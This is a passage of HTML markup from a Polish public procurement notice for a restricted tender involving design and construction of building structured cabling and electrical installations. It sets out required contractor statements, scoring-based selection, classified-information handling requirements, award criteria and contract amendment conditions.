              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) Oświadczenie wykonawcy o braku przesłanek wykluczenia  na podstawie art. 24 ust. 1 pkt 
12-23) i art. 24 ust.5 pkt 1 (załącznik nr 1, wzór nr 1). 
2) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy (dokument należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu)  załącznik nr 2.
Wykonawca na podstawie treści § 10.1. (Rozporządzenie. Ministra Rozwoju z dn.26.07.2016 r. 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy 
w postępowaniu o udzielenie zamówienia  Dz.U z 2016 r. poz. 1126) może wskazać dostępność dokumentu w formie elektronicznej, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych i nie załączać formy pisemnej dokumentu; zamawiający wymaga aby w takiej sytuacji wykonawca załączył oddzielną informację 
w formie pisemnej do wniosku w sprawie zakwalifikowania do udziału w postępowaniu 
z podaniem niezbędnych danych Wykonawcy dotyczących  nazwy i numeru rejestru lub ewidencji, adresu strony internetowej pod którym jest dostępny, pełnej nazwy Wykonawcy zapisanej w rejestrze lub ewidencji, numeru NIP; zamawiający pobierze sobie ten dokument samodzielnie. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) Oświadczenie Wykonawcy składane na podstawie art. 25a ust. 1 ustawy z dn. 29 stycznia 
2004 r.  dotyczące nie podleganiu wykluczeniu i potwierdzające spełnienie warunków udziału 
w postępowaniu i kryteriów selekcji wg. załączonego wzoru.
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców Oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie składane jest przez Wykonawców w zakresie, w którym każdy z Wykonawców wspólnie ubiegających się 
o zamówienie wykazuje spełnienie warunków udziału w postępowaniu lub kryteriów selekcji. Wykonawca, który powołuje się w celu wykazania spełnienia warunków udziału na zasoby innych podmiotów zamieszcza informacje o tym w jakim zakresie powołuje się na ich zasoby 
w Oświadczeniu (załącznik nr 3 do Wniosku  wzór nr 2)
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />1.Przewidywana liczba wykonawców, których zaprosi zamawiający: 8
2. Opis sposobu dokonania selekcji na podstawie treści art. 51 ust. 2 ustawy Pzp.
Zamawiający w przypadku gdy liczba wykonawców, która spełni warunki udziału 
w postępowaniu będzie większa od liczby wykonawców  przewidzianych do zaproszenia,  dokona klasyfikacji punktowej zdolności technicznej i zawodowej Wykonawców. Do klasyfikacji zamawiający przyjmie wyłącznie własne  zdolności techniczne i zawodowe  Wykonawcy lub Wykonawców, którzy będą ubiegali się o zamówienie wspólnie (jako konsorcjum firm). Zamawiający nie dopuszcza możliwości powołania się przez wykonawców ubiegających się o zamówienie na zdolności techniczne i zawodowe innych wykonawców zgodnie z treścią art. 22a ust. 1 ustawy Pzp. W przypadku gdy liczba wykonawców ubiegających się o przedmiot zamówienia będzie większa niż przewidziana w Ogłoszeniu zaproszenie otrzymają tylko ci wykonawcy, którzy spełnili warunki udziału w postępowaniu
 i otrzymają najwyższą ocenę w klasyfikacji punktowej (oceny punktowej wykazanych robót potwierdzających własne zdolności techniczne i zawodowe) obliczoną wg. zasady: 
1) za każdą wykazaną i wykonaną w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: dokumentację projektową (projekt budowlany, projekt wykonawczy, przedmiar robót) obejmujące swoim zakresem budowę budynkowych sieci strukturalnych 
z wydzieloną instalacją elektryczną o wartości min. 150 000,00 zł. (bez podatku VAT), wraz 
z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane  oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy -  otrzyma 0,3 pkt; 
2) za każdą wykazaną i wykonaną w okresie ostatnich 5 lat przed upływem terminu składania  wniosków o dopuszczenie do udziału postępowaniu a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie: robotę budowlaną obejmującą swoim zakresem budowę budynkowych sieci strukturalnych z wydzieloną instalacją elektryczną o wartości min. 150 000,00 zł. (bez podatku VAT),  wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty -  otrzyma 0,7 pkt; 

Suma punktów (za oba rodzaje wykazanych robót) uzyskanych przez poszczególnych wykonawców będzie decydowała o ich klasyfikacji. Wykonawca który uzyska największą liczbę punktów sklasyfikowany zostanie na pierwszym miejscu, pozostali w kolejności na podstawie otrzymanych punktów. W przypadku gdy na pozycji nr 8 zostanie sklasyfikowanych więcej niż jeden wykonawca z taką samą ilością punktów do dalszego postępowania zaproszeni zostaną wszyscy wykonawcy sklasyfikowani na tej pozycji.
</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1) Oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu składane na podstawie art. 25a ust. 1. (załącznik nr 1 do Wniosku, wzór nr 1).
2) Oświadczenie  o spełnieniu warunków udziału w postępowaniu i kryteriów selekcji na podstawie art. 25a ust. 1. (załącznik nr 3 do Wniosku, wzór nr 2).
3) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania w zakresie, w jakim powołuje się na ich zasoby warunków udziału w postępowaniu lub kryteriów selekcji i zamieszcza informacje dotyczące podmiotu na którego zasoby powołuje się w Oświadczeniu (załącznik nr 1 do Wniosku, wzór nr 1). 
4) Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom (bez kluczowej części zamówienia zastrzeżonego do osobistego wykonania przez Wykonawcę -  opis przedmiotu zamówienia) w celu wykazania  braku istnienia wobec nich braku podstaw  wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informację o tych podmiotach w Oświadczeniu, stanowiącym załącznik nr 1 do Wniosku (wzór nr 1). 
5) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców Oświadczenie 
(wg załączonego wzoru  załącznik nr 1 i załącznik nr 2) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w celu potwierdzenia  spełniania warunków udziału 
w postępowaniu i kryteriów selekcji oraz braku podstaw wykluczenia z postępowania. 
6)Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich 
w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika (pełnomocnictwo) powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania prawnego. Pełnomocnictwo musi być podpisane przez osoby reprezentujące każdego z wykonawców ubiegających się wspólnie 
o zamówienie publiczne oraz przez pełnomocnika. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do centralnej ewidencji i informacji o działalności gospodarczej. Dokument pełnomocnika należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik.
Każdy z Wykonawców ubiegających się wspólnie o zamówienie musi złożyć oddzielnie dokumenty i oświadczenia zgodnie z opisanymi przez Zamawiającego w Ogłoszeniu  wymaganiami. Oświadczenie w sprawie spełnienia warunków udziału zgodnie z treścią art. 24ust. 1b) składa w imieniu  wykonawców wspólnie ubiegających się o zamówienie ustanowiony pełnomocnik.
Jeżeli oferta wykonawców występujących wspólnie zostanie wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Wykonawcy, o których mowa w art. 23 ust. 1, ponoszą solidarną odpowiedzialność za wykonanie umowy.
7) Zamawiający wymaga aby do złożonego Wniosku o dopuszczenie do udziału 
 w postępowaniu w celu wykazaniu braku podstaw do wykluczenia z art. 24 ust.5 pkt 1), Zamawiający dołączył  dokument opisany w pozycji  Sekcja III.4) pkt 2).
8) W celu potwierdzenia, że Wykonawca spełnia warunek wynikający z treści art. 22 ust. 1b Ustawy Pzp w zakresie posiadania kompetencji i uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika z odrębnych przepisów, Wykonawca wraz z wnioskiem zobowiązany jest złożyć Oświadczenie pisemne potwierdzające posiadanie systemu teleinformatycznego umożliwiającego przetwarzanie informacji niejawnych o klauzuli zastrzeżone zgodnie z załączonym wzorem do Wniosku  załącznik nr 7, wzór nr 5.
9) W celu wykazania, że Wykonawca spełnia warunek dotyczący zdolności technicznej lub zawodowej wynikającej z treści art. 22 ust1b) Ustawy Pzp  Zamawiający żąda aby Wykonawca na potwierdzenie tego wykazał się wykonaniem prac projektowych i robót budowlanych zgodnie z opisem zawartym w pkt III.1.3 pkt 1)  i pkt 2) Ogłoszenia 
o zamówieniu. Wykaz prac projektowych i robót budowlanych należy sporządzić zgodnie 
z załącznikiem nr 4, wzór nr 3 do Wniosku.
10) Zamawiający żąda załączenia do Wniosku Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  załącznik nr 5 wzór nr 4.
11) Wykonawcy są zobowiązani do przekazania Zamawiającemu na podstawie treści art. 24 ust. 23 Ustawy  Oświadczenia o przynależności lub nie do tej samej grupy kapitałowej. Przekazanie Oświadczenia o przynależności lub nie do tej samej grupy kapitałowej musi nastąpić w terminie 3 dni od dnia przekazania im przez Zamawiającego informacji o wynikach spełnienia warunków udziału w postępowaniu i otrzymanych ocenach spełnienia tych warunków (art. 51 ust 1a Ustawy). Wykonawca składa Oświadczenie wg. własnego wzoru załączając lub nie dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu 
o udzielenie zamówienia. Uwaga! Oświadczenie musi mieć formę pisemną (patrz pkt 14).
12) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 5 Rozp. Min.  Rozwoju z dn. 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy
 w postępowaniu o udzielenie zamówienia (Dz.U. z 2016 r. poz. 1126), Wykonawca składa:
Pkt.1  informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy albo administracyjny kraju, 
w którym wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument w zakresie określonym w art. 24 ust.1 pkt 13,14 i 21, ust. 5 pkt 5 i 6 Ustawy Pzp.
Pkt. 2  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.
 13) Wykonawca będący podmiotem zagranicznym musi potwierdzić spełnienie warunku ochrony informacji niejawnych. Dokumenty potwierdzające zdolność wykonawcy do przetwarzania informacji niejawnych muszą spełniać wymagania wynikające z odpowiednich przepisów o ochronie informacji niejawnych. 
14) Oświadczenia, stanowiące załączniki do Wniosku o dopuszczenie do udziału 
w postępowaniu dotyczące Wykonawcy, innych podmiotów, na których zdolnościach 
i zasobach polega Wykonawca na podstawie treści art. 22a ust. 1  6 Ustawy Pzp oraz podwykonawców, składane są w  oryginale zgodnie z zapisami w § 14 ust. 1 Rozp. Min. Rozwoju z dn. 26 lipca 2016 r. Pozostałe dokumenty nie będące Oświadczeniami mogą być składane w formie poświadczonej za zgodność z oryginałem kopii. 
15) Zgodnie z treścią  § 14 ust. 1 Rozp. Min. Rozwoju z dn. 26 lipca 2016 r. poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca w zakresie dokumentów, które każdego z nich dotyczą.
16) Postępowanie prowadzone jest w języku polskim.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Oświadczenie o posiadaniu systemu teleinformatycznego umożliwiającego przetwarzanie informacji niejawnych o klauzuli co najmniej zastrzeżone spełniające wymagania określone 
w ustawie z dn. 05 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r. nr 182 poz. 1228) oraz Rozporządzeniu Prezesa Rady Ministrów z dn. 20 lipca 2011 r. w sprawie podstawowych wymagań bezpieczeństwa sieci i systemów teleinformatycznych (Dz. U. z 2011 r., nr 159 poz. 948). (załącznik nr 7, wzór nr 5  do Wniosku)
2)  W przypadku, gdy Wykonawca będzie polegał na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów w szczególności przedstawiając w tym celu zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia Zobowiązanie do udostępnienia zasobów w trybie art. 22a ustawy Pzp musi zawierać następujące informacje:
- nazwę przedmiotu zamówienia wraz z oznaczeniem sprawy i numerem Ogłoszenia 
o zamówieniu opublikowanym w BZP, którego dotyczy udostepnienie zasobów,
- dane o podmiocie udostępniającym zasoby (nazwa, adres, nr NIP, KRS)
- dane o Wykonawcy, któremu udostępniane są zasoby (nazwa, adres, NIP, KRS)
- dane na temat rodzaju zasobów jakie zostaną udostępnione Wykonawcy w przypadku zawarcia przez Wykonawcę umowy na wykonanie zamówienia publicznego, 
- dotyczące czasu udostępniania tych zasobów, sposobu w jaki będą wykorzystywane przez Wykonawcę udostępnione zasoby, zakresu udziału i bezpośredniego zaangażowania 
w wykonanie przedmiotu umowy przez podmiot udostępniający swoje zasoby.
- Podmiot udostępniający zasoby musi w treści zobowiązania  potwierdzić informację 
o zapoznaniu się z wymaganiami dotyczącymi ochrony informacji niejawnych w postępowaniu
 i potwierdzić spełnienie przez niego warunków z zakresu ochrony informacji niejawnych wymaganych przez Zamawiającego. Zobowiązanie stanowi załącznik nr 6 do wniosku.

UWAGA! Dokument ten powinien być własnoręcznie podpisany przez osoby reprezentujące podmiot trzeci, posiadające stosowne umocowanie prawne i złożony w oryginale. Zobowiązania podmiotów trzecich do udostępnienia zasobów, złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę, nie spełniają ww. wymogu. Dokument należy złożyć wraz z Wnioskiem o dopuszczenie do udziału w postępowaniu; 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  8<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />Informacja i opis zawarta w Ogłoszeniu o zamówieniu w pkt. III.5.2) Zakres Kryteriów Selekcji </div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>20</td></tr><tr><td>czas wykonania</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: 
Warunki wprowadzenia zmian Zamawiający  zapisał we wzorze umowy stanowiącej załącznik do SIWZ . Umowa wg. załączonego wzoru zostanie podpisana z tym Wykonawcą, którego oferta zostanie wybrana jako najkorzystniejsza. 
1. Na podstawie treści art. 144 ust.1 zakazuje się zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy chyba, że zmiany zostały przewidziane w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia w postaci jednoznacznych postanowień umownych, lub wynikają z  okoliczności przewidzianych w poniższych ustępach: 
1)  Strony przewidują możliwość zmiany terminu zakończenia przedmiotu umowy w sytuacji gdy: a) z przyczyn spowodowanych siłą wyższą, wystąpienia okoliczności o obiektywnym charakterze, których nie można było przewidzieć w chwili zawarcia umowy, b) udokumentowanego opóźnienia wprowadzenia Wykonawcy na budowę przez Zamawiającego, wstrzymanie  realizacji umowy (przestoje i opóźnienia) nie wynikające z winy Wykonawcy powodujące zmiany w harmonogramach robót, c) zachodzi konieczność wykonania rozwiązań (robót) zamiennych spowodowanych między innymi koniecznością dostosowania dokumentacji projektowej do zasad wiedzy technicznej i uzyskania celu umowy, zmianą regulacji prawnych, przepisów resortowych, możliwością zastosowania nowszych lub korzystniejszych dla Zamawiającego rozwiązań technologicznych lub technicznych, wycofaniem z rynku lub zaprzestaniem produkcji materiałów i urządzeń wyszczególnionych w dokumentacji, d) zmiana jest związana z uzasadnionymi potrzebami Zamawiającego, 
2) zmiany osób wyznaczonych do realizacji przedmiotu zamówienia na kluczowych 
     stanowiskach; projektanci, kierownika budowy, kierowników robót i innych;
3) zmiany stawek podatku VAT; urzędowa zmiana stawek podatku VAT może mieć tylko 
    wpływ na cenę (wartość brutto) umowy, natomiast wartość (netto) umowy nie może ulec
     zmianie;
4) w przypadku wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy;  

Możliwość zmiany terminu zakończenia przedmiotu umowy, o której mowa w ust. 1, będzie dodatkowo uwarunkowana doręczeniem Zamawiającemu przez Wykonawcę lub odpowiednio Wykonawcy przez Zamawiającego pisemnego zawiadomienia, informującego o wystąpieniu zdarzenia. Przedłużenie terminu wykonania terminu umowy nie może być dłuższe niż to uzasadnia przyczyna jego wydłużenia.
Okoliczności opisane w ust. 1 z wyłączeniem  pkt 3 i pkt 4 mogą zostać objęte aneksem do umowy wg. woli Zamawiającego.  Nie stanowią one (okoliczności) podstaw do zgłaszania dodatkowych roszczeń o charakterze finansowym przez Wykonawcę do zawartej umowy .

Na podstawie zapisów w art. 144 ust.1 zmiana postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy może mieć miejsce w sytuacji gdy:
a) zmiany zakresu rzeczowego zamówienia wynikające z okoliczności, których zamawiający  działając z należytą starannością nie mógł przewidzieć (konieczność wykonania dodatkowych prac projektowych wynikających z protokołów konieczności warunkujących wykonanie zamówienia podstawowego);
b) zmiany postanowień umownych nie prowadzą do zmiany charakteru umowy 
c)  wprowadzana zmiana ma niską wartość w stosunku do wartości umowy,
d)  w przypadku wystąpienia nie  przewidzianych okoliczności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/02/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
